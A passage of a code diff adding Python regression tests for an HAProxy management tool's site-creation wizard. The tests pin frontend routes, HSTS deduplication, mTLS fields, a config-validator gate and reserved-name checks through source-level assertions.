assert call, "R18 regression: cert API call no longer present"
assert "usage_type" not in call.group(0), (
"R18 regression: wizard added a usage_type filter — that "
"would hide server-side mTLS cert candidates"
)
+86
View File
@@ -0,0 +1,86 @@
"""v1.5.0 R12 — Bug B regression: wizard form must keep ALL step contents
mounted at all times.
In the first 1.5.0 deploy we observed `422 - Validation error` with body
`{apply_immediately: true}` even though the user had filled in the form.
Root cause: the wizard rendered only the active step's content, so Antd
Form.Item registrations for non-visible steps were unmounted and
`form.validateFields()` returned only the visible step's fields. Submit
then sent a body containing nothing but `apply_immediately`.
The fix renders every step's content at all times and toggles visibility
with `display: none`. We pin this fix in source via the assertions below
so a future refactor (e.g. switching back to a single-render Steps
container) cannot silently regress the bug.
"""
from pathlib import Path
import pytest
_WIZARD_PATH = (
Path(__file__).resolve().parent.parent.parent
/ "frontend"
/ "src"
/ "components"
/ "SiteWizard.js"
)
# Skip the whole module when frontend tree isn't checked out alongside the
# backend (e.g. inside the backend-only Docker container, where only /app
# is mounted). Tests still run on the host and in CI where the full
# repository is present.
if not _WIZARD_PATH.exists():
pytest.skip(
f"frontend not present at {_WIZARD_PATH}; running in backend-only "
"container is expected — skip wizard JS source assertions",
allow_module_level=True,
)
WIZARD_JS = _WIZARD_PATH.read_text()
def test_all_step_contents_always_mounted():
"""The wizard must map over all stepContents, NOT index by current step."""
# Positive marker: stepContents.map(...) renders every step.
assert "stepContents.map((s, idx)" in WIZARD_JS, (
"Bug B regression: SiteWizard must render ALL steps so Antd "
"Form.Item registrations stay alive across step navigation. Use "
"stepContents.map(...) with display:none gating, not stepContents[step]."
)
# Visibility gate: display: 'block' / 'none'.
assert "step === idx ? 'block' : 'none'" in WIZARD_JS
def test_old_single_step_render_removed():
"""The old single-render pattern must be gone."""
bad_pattern = "<div>{stepContents[step].content}</div>"
assert bad_pattern not in WIZARD_JS, (
f"Bug B regression: {bad_pattern!r} only renders one step at a "
"time and unmounts the others, causing validateFields()/getFieldsValue "
"to return an incomplete payload."
)
def test_submit_uses_get_fields_value_true_fallback():
"""handleSubmit should belt-and-braces merge getFieldsValue(true) so
that even if a future tweak breaks the always-mounted invariant, we
still send the full state."""
# Look at the body of handleSubmit (loose match — survive minor edits).
idx = WIZARD_JS.find("const handleSubmit")
assert idx >= 0
body = WIZARD_JS[idx : idx + 2000]
assert "form.validateFields()" in body
assert "form.getFieldsValue(true)" in body, (
"Bug B regression: handleSubmit should merge getFieldsValue(true) "
"as a fallback so display:none + form.preserve quirks cannot drop "
"fields from the POST body."
)
def test_preview_uses_get_fields_value_true():
"""runPreview must capture the WHOLE form, not just the active step."""
idx = WIZARD_JS.find("const runPreview")
assert idx >= 0
body = WIZARD_JS[idx : idx + 800]
assert "form.getFieldsValue(true)" in body
@@ -0,0 +1,51 @@
"""v1.5.0 R12 — HSTS injection must be idempotent.
Bulgu #f6: when the user already wrote a `Strict-Transport-Security`
directive into frontend.response_headers (e.g. resumed from a draft
that they hand-edited, or imported a config from another platform) AND
ssl.hsts_enabled=true, the previous logic blindly appended a SECOND
HSTS directive. HAProxy would emit two `Strict-Transport-Security`
response headers, which:
- inflates the config diff,
- triggers spec-strict clients to flag the response,
- is hard to audit ("which max-age wins?").
The fix detects an existing `strict-transport-security` substring (case
insensitive) and skips the auto-injection.
These are static source-level assertions so a future refactor cannot
regress.
"""
from pathlib import Path
SOURCE = (
Path(__file__).resolve().parent.parent
/ "routers"
/ "site_wizard.py"
).read_text()
def test_hsts_double_injection_guard_present_for_upload_existing_branch():
"""The wizard's upload/existing branch must guard against double-injection."""
# Look for the lower()-case substring check.
assert '"strict-transport-security" in hsts_response_headers.lower()' in SOURCE, (
"Bulgu #f6 regression: upload/existing branch must skip HSTS "
"injection when the user already supplied a Strict-Transport-Security "
"directive in frontend.response_headers."
)
def test_hsts_double_injection_guard_present_for_acme_branch():
"""The wizard's ACME branch (deferred frontend_config) must also guard."""
assert '"strict-transport-security" in hsts_acme_headers.lower()' in SOURCE, (
"Bulgu #f6 regression: ACME branch must skip HSTS injection when "
"the user already supplied a Strict-Transport-Security directive."
)
def test_hsts_only_injected_when_enabled_and_not_already_present():
"""Both branches must combine the enable flag AND the absence check."""
# We expect both branches to contain "if body.ssl.hsts_enabled and not _hsts_already...".
assert "body.ssl.hsts_enabled and not _hsts_already_present" in SOURCE
assert "body.ssl.hsts_enabled and not _hsts_already" in SOURCE
@@ -0,0 +1,227 @@
"""v1.5.0 R18 — "New Site (Wizard)" rebrand regression tests.
History of the rebrand chain (kept in this single test for clarity):
- v1.5.0 first deploy: "New Proxied Host" — under Frontends submenu
- R17: "Quick Setup" — top-level Quick Setup group
- R18 (this round): "New Site (Wizard)"— top-level Sites group
Naming rationale (R18, after user feedback):
"Quick Setup" was ambiguous — it could mean cluster, account or TLS
setup. "New Site (Wizard)" matches the dominant terminology in the
ingress / reverse-proxy space (Cloudflare 'Add a site', nginx-proxy-
manager 'Proxy Hosts', Plesk/cPanel 'Add domain', Caddy 'Sites'). The
group label is "Sites" — entity-oriented, mirroring the existing
Frontends / Backend Servers / SSL Certificates pattern.
Backward-compat invariants under test:
1. Canonical /sites/new + /sites/drafts routes resolve.
2. R17 /quick-setup{,/drafts} aliases still resolve.
3. v1.5.0 /proxied-hosts/{new,drafts} aliases still resolve.
4. Sidebar 'sites-group' precedes 'frontends-group' (primary onboarding).
5. Frontends submenu does NOT contain wizard links (no duplicates).
6. Card titles + Drafts page Resume button target the new canonical paths.
"""
import re
from pathlib import Path
import pytest
_REPO_FRONTEND = Path(__file__).resolve().parent.parent.parent / "frontend" / "src"
_APP_JS = _REPO_FRONTEND / "App.js"
_WIZARD_JS = _REPO_FRONTEND / "components" / "SiteWizard.js"
_DRAFTS_JS = _REPO_FRONTEND / "components" / "SiteDrafts.js"
def _read(p: Path) -> str:
if not p.exists():
pytest.skip(f"frontend tree not mounted at {p} — backend-only env")
return p.read_text()
# ----------------- Routes -----------------
def test_canonical_sites_route_exists():
src = _read(_APP_JS)
assert re.search(
r'<Route\s+path="/sites/new"\s+element=\{<SiteWizard',
src,
), "R18 regression: canonical /sites/new route not wired to SiteWizard"
def test_canonical_sites_drafts_route_exists():
src = _read(_APP_JS)
assert re.search(
r'<Route\s+path="/sites/drafts"\s+element=\{<SiteDrafts',
src,
), "R18 regression: canonical /sites/drafts route not wired to SiteDrafts"
def test_r17_quick_setup_aliases_preserved():
"""Backward-compat: bookmarks created during the R17 (Quick Setup)
window must still resolve."""
src = _read(_APP_JS)
assert re.search(
r'<Route\s+path="/quick-setup"\s+element=\{<SiteWizard',
src,
), "R18 regression: R17 /quick-setup alias removed (breaks recent bookmarks)"
assert re.search(
r'<Route\s+path="/quick-setup/drafts"\s+element=\{<SiteDrafts',
src,
), "R18 regression: R17 /quick-setup/drafts alias removed"
def test_v15_proxied_hosts_aliases_preserved():
"""Backward-compat: v1.5.0 first-deploy bookmarks/issue links must
still resolve."""
src = _read(_APP_JS)
assert re.search(
r'<Route\s+path="/proxied-hosts/new"\s+element=\{<SiteWizard',
src,
), "R18 regression: v1.5.0 /proxied-hosts/new alias removed"
assert re.search(
r'<Route\s+path="/proxied-hosts/drafts"\s+element=\{<SiteDrafts',
src,
), "R18 regression: v1.5.0 /proxied-hosts/drafts alias removed"
# ----------------- Sidebar order + label -----------------
def test_sites_group_appears_before_frontends_link():
"""The Sites group must come before the Frontends link.
R18b round 8 update: `frontends-group` was flattened to a single
top-level `/frontends` link (the group only had one child after
R18 removed the wizard duplicates). The Sites-before-Frontends
invariant still holds — primary onboarding (the wizard) sits
above the lower-level Frontends list page.
"""
src = _read(_APP_JS)
sites_idx = src.find("'sites-group'")
# Match the new top-level Frontends link key.
fe_idx = src.find("key: '/frontends',")
assert sites_idx != -1, "R18 regression: 'sites-group' menu key missing"
assert fe_idx != -1, "R18b round 8 regression: top-level Frontends key missing"
assert sites_idx < fe_idx, (
"Sites group must precede the Frontends link in menuItems — "
"rebrand goal is making the wizard the primary onboarding path"
)
def test_frontends_group_subpage_was_flattened():
"""R18b round 8: the Frontends entry must be a top-level link,
NOT a `frontends-group` with a single 'All Frontends' child.
The pre-R18b shape (single child under a collapsible group) was
a leftover from when wizard links lived under the same group.
Now that `sites-group` owns onboarding, a single-child group is
pure click-cost with no navigational benefit.
"""
src = _read(_APP_JS)
# The legacy collapsible-group shape must be gone.
assert "key: 'frontends-group'" not in src, (
"R18b round 8 regression: 'frontends-group' menu key still "
"present — flatten to a top-level /frontends link instead"
)
# The legacy single-child label "All Frontends" must be gone too.
assert ">All Frontends<" not in src, (
"R18b round 8 regression: 'All Frontends' subpage label still "
"present in App.js — flatten to top-level 'Frontends'"
)
# Top-level Frontends link must use a plain Link to /frontends.
assert '<Link to="/frontends">Frontends</Link>' in src, (
"R18b round 8 regression: top-level Frontends Link missing or "
"label changed unexpectedly"
)
def test_old_quick_setup_group_removed():
"""The R17 'quick-setup-group' menu key must be GONE — its presence
after R18 would mean two duplicate top-level groups (Sites +
Quick Setup) confusing operators."""
src = _read(_APP_JS)
# The string can still appear in legacy comments; what we forbid is
# the actual menuItems entry. A plain `key: 'quick-setup-group'`
# check is good enough to catch the regression.
assert "key: 'quick-setup-group'" not in src, (
"R18 regression: stale 'quick-setup-group' menu key still "
"present — would render duplicate Sites + Quick Setup groups"
)
def test_sites_group_uses_action_icon():
"""ThunderboltOutlined is the action-oriented icon used on the
primary 'New Site' child item — guard against accidentally removing
the import while keeping the JSX reference (runtime crash)."""
src = _read(_APP_JS)
assert "ThunderboltOutlined" in src, (
"R18 regression: ThunderboltOutlined import dropped while still "
"referenced in the Sites menu item — runtime crash"
)
def test_default_open_keys_handles_all_route_generations():
"""defaultOpenKeys must expand the Sites group on canonical AND
every legacy alias path — otherwise a user landing on a
bookmarked old URL sees the menu in a confusing collapsed state."""
src = _read(_APP_JS)
for prefix in ("/sites", "/quick-setup", "/proxied-hosts"):
assert re.search(
rf"selectedKey\.startsWith\('{re.escape(prefix)}'\)",
src,
), f"R18 regression: defaultOpenKeys no longer expands on {prefix}"
# And the group it opens MUST be the new sites-group, not the
# stale R17 quick-setup-group.
assert "'sites-group'" in src
assert "['quick-setup-group']" not in src, (
"R18 regression: defaultOpenKeys still references the stale "
"R17 'quick-setup-group' — the Sites group will not auto-open"
)
# ----------------- Card title + Drafts navigation -----------------
def test_wizard_card_title_rebranded():
src = _read(_WIZARD_JS)
assert re.search(
r'<Card\s+title="New Site \(Wizard\)"',
src,
), "R18 regression: SiteWizard Card title not 'New Site (Wizard)'"
def test_drafts_card_title_rebranded():
src = _read(_DRAFTS_JS)
assert 'title="Site Drafts"' in src, (
"R18 regression: SiteDrafts Card title not 'Site Drafts'"
)
def test_drafts_resume_targets_canonical_sites_path():
"""The Resume button on the Drafts page must navigate to the
canonical /sites/new — legacy aliases still work but new
navigations target the rebrand for cleaner browser history."""
src = _read(_DRAFTS_JS)
assert "navigate('/sites/new')" in src, (
"R18 regression: Site Drafts Resume button no longer targets "
"/sites/new"
)
def test_wizard_cancel_modal_targets_canonical_drafts_path():
"""handleCancel save-and-navigate must target /sites/drafts."""
src = _read(_WIZARD_JS)
assert "navigate('/sites/drafts');" in src, (
"R18 regression: handleCancel no longer targets /sites/drafts"
)
def test_toast_messages_use_site_terminology():
"""User-facing success toasts on submit must use 'Site' (the new
terminology) — leaving them as 'Proxied host' creates a mixed
vocabulary in the same flow."""
src = _read(_WIZARD_JS)
assert "Site created and applied successfully" in src
assert "Site created (PENDING version" in src
@@ -0,0 +1,227 @@
"""v1.5.0 R17 — Wizard ↔ Manual minimum-parity regression tests.
Covers the two new fields the wizard surfaces so users no longer have to
drop down to manual entity creation just for these capabilities:
1. SSLChoice.ssl_verify (mTLS client cert auth on the HTTPS bind)
- matches FrontendConfig.ssl_verify Literal["none", "optional", "required"]
- default None (omitted) so v1.5.0 first-deploy hosts continue
serving anonymous TLS — opt-in security upgrade
- forwarded to:
* routers/site_wizard.py upload+existing branch via
object.__setattr__(https_payload, "ssl_verify", body.ssl.ssl_verify)
* deferred_https_action.frontend_config["ssl_verify"] (ACME)
* routers/letsencrypt.py SimpleNamespace shim (already had key)
2. ServerStep.ssl_certificate_id (server-side mTLS client cert)
- matches POST /api/backends/{id}/servers payload
- default None — backward-compat with v1.5.0 saved drafts
- rejected when ssl_enabled=False (meaningless combination)
- forwarded by services/backend_service.create_server_row via
getattr(server, "ssl_certificate_id", None) — the wizard router
passes the ServerStep model directly, so no router-side change
is needed (test pins the contract though)
"""
import re
from pathlib import Path
import pytest
from pydantic import ValidationError
from models.site_wizard import (
SiteCreate,
SSLChoice,
ServerStep,
)
_REPO_ROOT = Path(__file__).resolve().parent.parent
_PROXIED_HOST_PY = _REPO_ROOT / "routers" / "site_wizard.py"
_LETSENCRYPT_PY = _REPO_ROOT / "routers" / "letsencrypt.py"
_BACKEND_SERVICE_PY = _REPO_ROOT / "services" / "backend_service.py"
# ----------------- Pydantic: SSLChoice.ssl_verify -----------------
def test_ssl_choice_ssl_verify_accepts_none_only():
"""Bulgu #26 (round-12 audit): SSLChoice.ssl_verify now rejects
'optional' and 'required' because the renderer's client-CA path
is a placeholder that silently drops the verify directive, which
means the operator's mTLS selection would NOT actually be
enforced. Only 'none' (and unset / form-cleared empties) pass.
"""
ssl = SSLChoice(
mode="upload", name="c", certificate_content="x",
private_key_content="y", ssl_verify="none",
)
assert ssl.ssl_verify == "none"
for forbidden in ("optional", "required"):
with pytest.raises(ValidationError):
SSLChoice(
mode="upload", name="c", certificate_content="x",
private_key_content="y", ssl_verify=forbidden,
)
def test_ssl_choice_ssl_verify_default_is_none():
"""Default MUST be None. Setting it to e.g. 'none' here would change
the bind directive emitted for v1.5.0 hosts that were created before
the field existed (silent backward-compat regression)."""
ssl = SSLChoice(
mode="upload", name="c", certificate_content="x", private_key_content="y"
)
assert ssl.ssl_verify is None
def test_ssl_choice_ssl_verify_rejects_invalid_literal():
with pytest.raises(ValidationError):
SSLChoice(
mode="upload",
name="c",
certificate_content="x",
private_key_content="y",
ssl_verify="optionall", # typo — must fail
)
# ----------------- Pydantic: ServerStep.ssl_certificate_id -----------------
def test_server_step_ssl_certificate_id_optional_default_none():
s = ServerStep(server_name="srv1", server_address="10.0.0.1", server_port=8080)
assert s.ssl_certificate_id is None
def test_server_step_ssl_certificate_id_requires_ssl_enabled():
"""ssl_certificate_id without ssl_enabled is meaningless — HAProxy
silently ignores the cert directive on plaintext server lines."""
with pytest.raises(ValidationError) as exc:
ServerStep(
server_name="srv1",
server_address="10.0.0.1",
server_port=8080,
ssl_enabled=False,
ssl_certificate_id=42,
)
assert "ssl_enabled" in str(exc.value).lower()
def test_server_step_ssl_certificate_id_with_ssl_enabled_ok():
s = ServerStep(
server_name="srv1",
server_address="10.0.0.1",
server_port=8080,
ssl_enabled=True,
ssl_certificate_id=42,
)
assert s.ssl_certificate_id == 42
def test_server_step_ssl_certificate_id_ge_1():
"""0 / negative IDs must be rejected — defensive guard against
fat-fingered API calls (FK is enforced by Postgres later)."""
with pytest.raises(ValidationError):
ServerStep(
server_name="srv1",
server_address="10.0.0.1",
server_port=8080,
ssl_enabled=True,
ssl_certificate_id=0,
)
# ----------------- Backward-compat: payload without new fields -----------------
def test_legacy_payload_without_new_fields_still_validates():
"""A v1.5.0-shaped payload (no ssl.ssl_verify, no
server.ssl_certificate_id) MUST still validate cleanly. This is the
upgrade path: existing saved drafts and direct API callers must not
break."""
legacy = {
"cluster_id": 1,
"domains": ["example.com"],
"backend": {"name": "be1", "balance_method": "roundrobin", "mode": "http"},
"servers": [
{"server_name": "s1", "server_address": "10.0.0.1", "server_port": 8080}
],
"frontend": {
"name": "fe1",
"mode": "http",
"bind_address": "*",
"bind_port": 8080,
},
"ssl": {
"mode": "upload",
"name": "c",
# Pydantic enforces PEM-shaped strings; minimal but valid
# PEM blocks satisfy the wizard's regex without needing real
# crypto material for this unit test.
"certificate_content": "-----BEGIN CERTIFICATE-----\nx\n-----END CERTIFICATE-----",
"private_key_content": "-----BEGIN PRIVATE KEY-----\nx\n-----END PRIVATE KEY-----",
"https_bind_port": 8443,
},
"apply_immediately": False,
}
p = SiteCreate(**legacy)
assert p.ssl.ssl_verify is None
assert p.servers[0].ssl_certificate_id is None
# ----------------- Static source assertions: forwarding contract -----------------
def test_https_payload_setattr_includes_ssl_verify():
"""routers/site_wizard.py upload+existing branch: the
object.__setattr__ loop on the SSL-cert FrontendConfig shim MUST
forward `ssl_verify` so that create_frontend_row's bind generation
sees the wizard's choice. R12 #f1 introduced this forwarding pattern
for ssl_alpn / hsts / etc.; R17 extends it with ssl_verify."""
src = _PROXIED_HOST_PY.read_text()
# The forwarding tuple loop is the canonical place; the new entry
# MUST be present alongside ssl_strict_sni.
assert re.search(
r'\(\s*"ssl_verify"\s*,\s*body\.ssl\.ssl_verify\s*\)',
src,
), 'R17 regression: ssl_verify is no longer forwarded onto https_payload via object.__setattr__'
def test_deferred_https_action_includes_ssl_verify():
"""ACME branch: deferred_https_action.frontend_config MUST carry
ssl_verify so that letsencrypt.py::_execute_post_completion_actions
can forward it via the SimpleNamespace shim. Without it, ACME-issued
HTTPS frontends would silently drop the user's mTLS choice."""
src = _PROXIED_HOST_PY.read_text()
assert re.search(
r'"ssl_verify"\s*:\s*body\.ssl\.ssl_verify',
src,
), "R17 regression: deferred_https_action.frontend_config dropped ssl_verify"
def test_letsencrypt_simple_namespace_forwards_ssl_verify():
"""The SimpleNamespace shim assembled in
_execute_post_completion_actions must pull ssl_verify out of the
frontend_config dict. Already present pre-R17, but pinned here so
a future refactor can't silently drop it."""
src = _LETSENCRYPT_PY.read_text()
assert re.search(
r'ssl_verify\s*=\s*fe_cfg\.get\(\s*"ssl_verify"\s*\)',
src,
), "R17 regression: post-completion SimpleNamespace shim dropped ssl_verify"
def test_create_server_row_forwards_ssl_certificate_id():
"""services/backend_service.py::create_server_row MUST pull
ssl_certificate_id off the server payload via getattr (so the wizard
ServerStep model and the manual server create payload share one
code path). Pin the contract — without it the wizard's new
server.ssl_certificate_id field would silently drop on its way to
the INSERT."""
src = _BACKEND_SERVICE_PY.read_text()
assert re.search(
r'getattr\(\s*server,\s*"ssl_certificate_id",\s*None\s*\)',
src,
), 'R17 regression: create_server_row no longer forwards ssl_certificate_id'
# The column must also still be in the INSERT column list.
assert "ssl_certificate_id" in src.split("INSERT INTO backend_servers")[1].split(") VALUES")[0]
@@ -0,0 +1,192 @@
"""
Phase 2 (R11-audit follow-up, PR-5 scope): pre-persist HAProxy
config validator gate on the Site Wizard create endpoint.
The wizard now runs the rendered config through
``HAProxyConfigValidator`` BEFORE writing the ``config_versions``
PENDING row, and aborts the transaction (HTTP 422) if any
ERROR-level diagnostic fires. This is a defence-in-depth layer
on top of:
* Pydantic Literal/coerce validation on the request body.
* DB UNIQUE / FOREIGN KEY / partial-index constraints.
* Generator-side safeguards (``_apply_bind_ssl_verify``,
``_format_redirect_rule``, bucket-ordered emit, stick-table
dedup).
The user-stated rule is: "the UI must not allow any operation
that would fail HAProxy validation". This test suite pins the
gate's source-level structure so a future refactor cannot remove
it silently.
"""
from __future__ import annotations
import re
from pathlib import Path
_ROOT = Path(__file__).resolve().parents[1]
_ROUTER = _ROOT / "routers" / "site_wizard.py"
def _src() -> str:
return _ROUTER.read_text()
def test_pre_persist_validator_gate_imports_validator():
"""The wizard create endpoint must import the validator INSIDE
the transaction (lazy import) so a missing module never breaks
cold-start, and call its `validate_config` on the generated
string."""
src = _src()
assert "HAProxyConfigValidator" in src, (
"Phase 2 regression: HAProxyConfigValidator import is gone "
"from the wizard router — the pre-persist gate is missing."
)
assert "ValidationLevel" in src, (
"Phase 2 regression: ValidationLevel import is gone — gate "
"cannot distinguish ERROR from WARNING/SUGGESTION."
)
def test_pre_persist_gate_runs_inside_transaction():
"""The validator call must live INSIDE the
`async with conn.transaction():` block so that a 422 raises
BEFORE the `INSERT INTO config_versions ...` and the transaction
rolls back, leaving the database clean (no orphan
backend / server / frontend rows for an invalid wizard run)."""
src = _src()
# Find the transaction block start
tx_idx = src.find("async with conn.transaction():")
assert tx_idx > 0, "transaction block not found in wizard router"
# The validator call must appear after the transaction start
val_idx = src.find("HAProxyConfigValidator()", tx_idx)
assert val_idx > tx_idx, (
"Phase 2 regression: HAProxyConfigValidator call must be "
"INSIDE the wizard's `async with conn.transaction():` "
"block so a 422 rolls back the freshly-inserted entities."
)
# The config_versions INSERT must come AFTER the validator gate
insert_idx = src.find("INSERT INTO config_versions", val_idx)
assert insert_idx > val_idx, (
"Phase 2 regression: validator gate is AFTER the "
"`INSERT INTO config_versions` — gate is structurally "
"ineffective (the PENDING row is already persisted)."
)
def test_pre_persist_gate_blocks_on_error_level_only():
"""The gate must filter for ERROR-level results — a WARNING
(e.g. an unknown but harmless directive) must NOT block create.
Only fatal-equivalent diagnostics abort the transaction."""
src = _src()
# The list comprehension that filters validator results must
# reference ValidationLevel.ERROR explicitly.
filter_pattern = re.compile(
r"if r\.level == ValidationLevel\.ERROR",
re.MULTILINE,
)
assert filter_pattern.search(src), (
"Phase 2 regression: validator gate must filter "
"`r.level == ValidationLevel.ERROR` — without the filter "
"the gate would block on harmless WARNING-level findings."
)
def test_pre_persist_gate_raises_422_with_structured_error_payload():
"""When the gate fires it must raise HTTP 422 (Unprocessable
Entity) with a structured `errors` array so the frontend can
render the issues as a list, not a giant dump."""
src = _src()
# 422 status code
assert "status_code=422" in src, (
"Phase 2 regression: validator gate must use HTTP 422, "
"not a generic 400 — 422 is the correct status for a "
"syntactically-valid request that fails business / "
"validation rules."
)
# Structured error tag
assert '"haproxy_validation_failed"' in src, (
"Phase 2 regression: validator gate must surface the "
"`haproxy_validation_failed` error tag so the frontend "
"can route the response into the dedicated banner."
)
# Structured `errors` field with line/message
assert '"line": e.line_number' in src and '"message": e.message' in src, (
"Phase 2 regression: validator gate response must include "
"per-error `line` + `message` so the operator can locate "
"the offending rule."
)
def test_pre_persist_gate_caps_error_payload():
"""Defence: a misconfigured cluster could produce hundreds of
validator findings. The response payload caps to the first 20
so we don't blow up the wire / UI table with 500+ rows."""
src = _src()
# The slice [:20] must be present on the validator-error list
assert "_val_errors[:20]" in src, (
"Phase 2 regression: validator gate response should cap "
"the error array (first 20 items) — uncapped payloads can "
"blow up the response size for misconfigured clusters."
)
def test_pre_persist_gate_validator_crash_is_non_fatal():
"""If the validator itself crashes (NEW directive it doesn't
recognise, edge case in our static rules) the wizard create
must NOT block — the apply-time `haproxy -c` on the agent is
the ultimate authority. We log a WARNING and proceed."""
src = _src()
# The validator's own try/except must catch the broad Exception
# AFTER re-raising HTTPException so 422s still escape.
assert "except HTTPException:" in src, (
"Phase 2 regression: validator gate must let HTTPException "
"bubble up (transaction rollback path) but swallow other "
"exceptions to keep validator bugs from blocking creation."
)
assert "non-fatal" in src.lower() or "validator crashed" in src.lower(), (
"Phase 2 regression: validator gate's broad-except branch "
"must log a clear 'non-fatal / validator crashed' message "
"so operators can tell a validator bug from an actual "
"config problem in the logs."
)
def test_pre_persist_gate_only_runs_on_non_empty_config():
"""If the upstream config-generation step itself raised, the
string is empty and we already logged ERROR. Skipping the
validator on an empty string avoids a misleading 'config has
no `frontend` section' warning when the real cause was the
generator crash above.
Phase K Phase C: site_wizard.py now also calls
`HAProxyConfigValidator()` from inside `preview_create` on the
dry-run path (gated by `if validate_haproxy_config:`). The
create-time gate stays guarded by `if config_content:` — the
pin walks past the preview-side call so it lands on the
create_site validator call, which is the path this test
actually pins.
"""
src = _src()
# Pin the create_site path's validator call. There are two
# validator references after Phase K: one in `preview_create`
# (gated by `if validate_haproxy_config:`) and one in
# `create_site` (gated by `if config_content:`). We want the
# latter — the create-time gate where empty config_content can
# surface from a generator crash.
create_idx = src.find("async def create_site(")
assert create_idx > 0, "create_site function not found"
val_idx = src.find("HAProxyConfigValidator()", create_idx)
assert val_idx > 0, "HAProxyConfigValidator() call not found inside create_site"
# Phase K Phase D follow-up (Bulgu #12 round 3): the explanatory
# comment block above the validator call grew when we forwarded
# `partial_fragment=True` to suppress false-positive global-section
# warnings. Widen the lookback window so the pin keeps catching the
# guard while accommodating the larger inline docs.
pre_window = src[max(0, val_idx - 1500) : val_idx]
assert "if config_content:" in pre_window, (
"Phase 2 regression: validator gate must be guarded by "
"`if config_content:` — running the validator on an empty "
"string surfaces misleading 'no frontend section' findings "
"when the real failure was upstream config generation."
)
@@ -0,0 +1,201 @@
"""
Phase 3 (R11-audit follow-up): wizard-vs-manual flow parity hardening.
The mandate is to bring the wizard up to par with the healthy
patterns the manual single-entity create endpoints have already
battle-tested in production. Where the manual flow has a guard
the wizard didn't have, the wizard now has the same guard.
Two healthy-pattern gaps were identified and closed in this commit:
1. Reserved-name check on `body.frontend.name` AND `body.backend.name`.
Manual `create_frontend` (`routers/frontend.py:442`) and
`create_backend` (`routers/backend.py:545`) refuse names that
collide with the well-known `listen stats` / `listen monitoring`
blocks agents preserve from local config. The wizard used to let
such names through; the apply-time `haproxy -c` would then fail
with the confusing 'proxy has same name' error far away from the
create site. Wizard now 400s on these names UP FRONT.
2. `option httpchk` strip on `body.frontend.options`. Manual
`create_frontend` runs payload.options through
`filter_httpchk_from_options` so the backend-only directive
never lands under a frontend (which produces a clean-but-
irritating reload warning). Wizard now mirrors that filter
on BOTH the HTTP and HTTPS frontend `model_copy` payloads.
"""
from __future__ import annotations
from pathlib import Path
_ROOT = Path(__file__).resolve().parents[1]
_ROUTER = _ROOT / "routers" / "site_wizard.py"
def _src() -> str:
return _ROUTER.read_text()
# ─────────────────────────────────────────────────────────────────────────────
# Reserved-name check
# ─────────────────────────────────────────────────────────────────────────────
def test_wizard_has_reserved_names_constant():
"""The wizard must declare the reserved-name set explicitly so a
grep diff against `routers/frontend.py` / `routers/backend.py`
confirms parity at code-review time."""
src = _src()
# Set membership: at least the four most common collisions.
for name in ("stats", "haproxy-stats", "monitoring", "admin"):
assert f'"{name}"' in src, (
f"Phase 3 regression: reserved-name '{name}' is missing "
"from the wizard's _RESERVED_NAMES set — wizard parity "
"with manual create endpoints is broken."
)
def test_wizard_reserved_name_check_blocks_frontend():
"""Reserved frontend names must hit a 400 before the wizard
enters the atomic transaction (so we never persist a row whose
name will collide with an agent-preserved listen block)."""
src = _src()
# The 400 raise that mentions 'reserved' must appear BEFORE the
# `async with conn.transaction():` block.
tx_idx = src.find("async with conn.transaction():")
assert tx_idx > 0
reserved_check_idx = src.find('Frontend name', src.find('_RESERVED_NAMES'))
assert 0 < reserved_check_idx < tx_idx, (
"Phase 3 regression: reserved-name check must run BEFORE the "
"atomic transaction so it can raise 400 without leaving any "
"DB rows behind."
)
def test_wizard_reserved_name_check_blocks_backend():
"""Reserved backend names must also 400 (manual create_backend
enforces the same set). Pin the reserved-set membership check
against `body.backend.name.lower() in _RESERVED_NAMES`."""
src = _src()
# Both reserved-name guards must be present and reference the set.
assert "body.frontend.name.lower() in _RESERVED_NAMES" in src, (
"Phase 3 regression: frontend reserved-name guard is missing "
"or no longer references _RESERVED_NAMES."
)
assert "body.backend.name.lower() in _RESERVED_NAMES" in src, (
"Phase 3 regression: backend reserved-name guard is missing "
"or no longer references _RESERVED_NAMES."
)
def test_wizard_reserved_name_message_matches_manual():
"""The 400 detail wording must hint at 'listen stats' so the
operator can act on it. Manual endpoints use the same wording."""
src = _src()
assert "listen stats" in src.lower(), (
"Phase 3 regression: reserved-name 400 detail must mention "
"'listen stats' so the operator understands why the name is "
"blocked. Parity with manual endpoints."
)
# ─────────────────────────────────────────────────────────────────────────────
# `option httpchk` strip on frontend options
# ─────────────────────────────────────────────────────────────────────────────
def test_wizard_filters_httpchk_from_frontend_options():
"""`option httpchk` is BACKEND-only — it must be stripped from
the wizard's frontend `options` block before the row is
inserted. The filter helper is defined locally in the wizard
and applied to BOTH the HTTP and HTTPS frontend payloads."""
src = _src()
assert "_filter_httpchk_from_options" in src, (
"Phase 3 regression: wizard must declare a local "
"_filter_httpchk_from_options helper to strip backend-only "
"directives from the frontend options block."
)
# The filter must be applied to BOTH model_copy paths.
occurrences = src.count("_frontend_options_filtered")
assert occurrences >= 3, (
"Phase 3 regression: _frontend_options_filtered should be "
f"used in 3 places (filter site + http payload + https "
f"payload), but found {occurrences}. The HTTPS branch may "
f"have been dropped."
)
def test_filter_httpchk_helper_drops_only_exact_match():
"""The local filter implementation must be EXACT-match (case-
insensitive `option httpchk` line). It MUST NOT drop
`option httpchk-strict` or `option httpchk send-state` etc.
(manual `filter_httpchk_from_options` has the same contract)."""
src = _src()
# The filter implementation lambda / function must use a strict
# equality compare on the stripped+lowered line.
assert 'line.strip().lower() != "option httpchk"' in src, (
"Phase 3 regression: _filter_httpchk_from_options must use "
"STRICT-EQUALITY filtering (`line.strip().lower() != "
"\"option httpchk\"`). A `startswith` check would also drop "
"valid variants like `option httpchk send-state`."
)
def test_filter_httpchk_handles_none_and_empty():
"""The filter must short-circuit on None / empty string (manual
parity)."""
src = _src()
# `if not options: return options` short-circuit must be present.
assert "if not options:" in src and "return options" in src, (
"Phase 3 regression: _filter_httpchk_from_options must "
"short-circuit on None / empty so a missing `options` field "
"doesn't crash the wizard."
)
# ─────────────────────────────────────────────────────────────────────────────
# Phase 4: preview parity (operator must see the same warning
# the create endpoint hard-blocks on, so they correct names BEFORE
# they invest time filling the rest of the wizard form)
# ─────────────────────────────────────────────────────────────────────────────
def test_preview_surfaces_reserved_name_warning_for_frontend():
"""The wizard preview endpoint must list a reserved-name warning
when `body.frontend.name` is in the same set the create
endpoint blocks on. Pre-fix the operator filled the wizard,
hit Submit, and only THEN saw the 400 — preview now warns
up front."""
src = _src()
# The preview's reserved-name warning must mention "is reserved"
# AND "Frontend name" alongside the warnings.append call.
assert "_PREVIEW_RESERVED_NAMES" in src, (
